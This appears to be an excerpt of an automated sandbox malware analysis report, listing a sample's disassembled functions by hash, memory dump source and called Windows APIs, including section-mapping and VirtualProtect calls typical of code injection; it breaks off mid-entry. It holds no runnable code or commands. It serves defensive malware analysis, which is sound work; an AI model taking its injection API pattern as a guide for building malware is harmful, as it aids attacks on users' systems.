                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
                                                                                                                                                                                                                                                                                                                  • Instruction ID: daf8977218c418413866257df5c9087131837fd98e0c4230724de407841e0162
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3801DF31708104E7DB209A848A4DB5E7320AB40B10F208577E507BA1C0DAF9AA07AFAB
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208706668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5524fd7572365f35614fa46947343296b9db081daee3b4d0816b59f029c0b045
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2101A731704104E7D7209A448A4EB5E7720AB40704F208477E5067A1C4DAB9EA07AB6B
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208706668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2a527b723104a8d4642483acce18f9de5ed6d5a74c4e47f32731208c7d716ef4
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1801A231708104E7DB209A849A4DF9F7720AB40B14F208477E5027A1C0DAF9AA07AFAB
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208724906.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __malloc_crt
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 3464615804-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6534e10226297e339f4658bfcf21ca7635ed003ce0470ead6bcd670b1f8b2216
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 39bf8517ed29ffd9322e22d1fa5be3ed8d731800a1d3e5f0e08985437c400f20
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6534e10226297e339f4658bfcf21ca7635ed003ce0470ead6bcd670b1f8b2216
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51F0E9375001105ACB307734BC4A8A72228CAD536C316483BF401E37A0FA3A4D8B82AD
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(007BC8CC,007BC964,00000040,?,?,0042EBF4), ref: 0042E118
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208724906.000000000042E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_42e000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: eec3ad208163954146d9126300b6ea4b62a28f544574202ac31790fe23fec003
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 23346e8c6619fbbda6626ef8913dc5ea4368bbdd846615d2d8d5797c2c4b63a6
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eec3ad208163954146d9126300b6ea4b62a28f544574202ac31790fe23fec003
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B01E8B110A3409EE701CFA5FE85B12BBA4E748705F10B12DF255962B1CF784640CBBD
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208706668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1276e484f00ba66cbffb4616bb4d5d076efec51046982770477825c9afbd6400
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F01D2B6708205FADB005A949C62EBB3618AB41755F300637BA13B80F1C57D8513FA6F
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208706668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0230620869f43b82b90ed4dddf49477c9f5c6c73dade890abd4ec4b7d4a8195a
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4801BCB6308205FADB005A949C62FBA3219AB84751F30053BB613BC0F1C53D8513FA2F
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208706668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9a4b4ffd5ca22a672d673467c452b15ea5c40039b4ea8ded510267d200494456
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A01B1B6308205FADB115A949C61A7A3319AB45711F30053BB613B80F2C53D8512FA1F
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208706668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5a2bb716a64f0a1f1a6e426f0b200f3e6862a670896c4db1e76ea4af0659c5ba
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3101DFB2308205FADB005AD49C62F7A3219AB85715F30453BB623B80F1C63D8512FB2F
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0091E6C8
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2209438963.0000000000919000.00000040.00000020.00020000.00000000.sdmp, Offset: 00919000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_919000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 430a1a6e07eee5c5c03b2d6984712bf0068a41ed8d1a1a03f25f27c968e0d7ed
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6113C79A00208EFDB01DF98C985E98BBF5AF08350F058094F9489B362D771EA90DF80
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208706668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 689da8ed0bf63c85a60a16fbbe407e4b0918199af58fa2149c0a58fdfe32668e
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E0181B6308105FADB115AD49D52FBA3719AB45751F30453BB613B80F2C53D8512FB2B
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019B4
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208706668.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1885482327-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9477092311c163758adf26378a137d016a4cc75b4861da4fd192d9fcf75081b0
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25016D72304105FADB119AD09C52EAA3729AB48355F30457BB613BD0F2C63D8552EB2B
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2209182155.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_890000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                                                                                  • API String ID: 0-2784972518
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                                                  • Instruction ID: adcd894b9609cd8df190261d58f918eeacb957f99d2b879a591d27d843b4e4d9
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 713139B6900619DFDB10DF99C880AAEBBF5FF48328F29414AD841E7211D771EA45CFA4
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208724906.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 997d061023fea84217d7896bc89f5b679ef859598340dc2ee0e0edaf47770af1
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CC1B273D4E4F3068B314A2D45182BFEE626E91B4231FC3A6DCD03F289C22A6F9595D4
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208724906.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8c1c314650cb33926d7d845b9b47a2ea7d99c7205e95564b5c8b6de24b2eab77
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42C1C573D4A5F3068B314A2D55182BFEEA26E91B4631FC392DCD03F389C22A6F9195D4
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208724906.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3103206f00617756809651bdfc99f9aa367bfca46341401ea0aaf2405674f667
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00C1D233D4A4F3068B32892D55183BFEE616E91B4631FC3D2CCD03F289C62A6E9596D4
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208724906.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                                                                                                                                                                  • Instruction ID: e1cfddaeba605329e32cd52da9eafeea525dd5a475fb3fc42de2c59d02cdf140
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8AB1C833D4E5F3068735853D55183BBEEA26E91B4131FC396CCD03F289C62AAE9296D4
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2209438963.0000000000919000.00000040.00000020.00020000.00000000.sdmp, Offset: 00919000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_919000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6234efb314693bbf7db1dbc09c4877950891f367d67c1dc4d7170ca04a956af4
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1211AC72340104AFD710CF95DC91FE273EAEB88320B298469ED14CB306D679E882C760
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2209182155.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_890000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1b35e33e417a343a45b1bc88ba0e5a1cab096ecf583cc3962548dd80f0843350
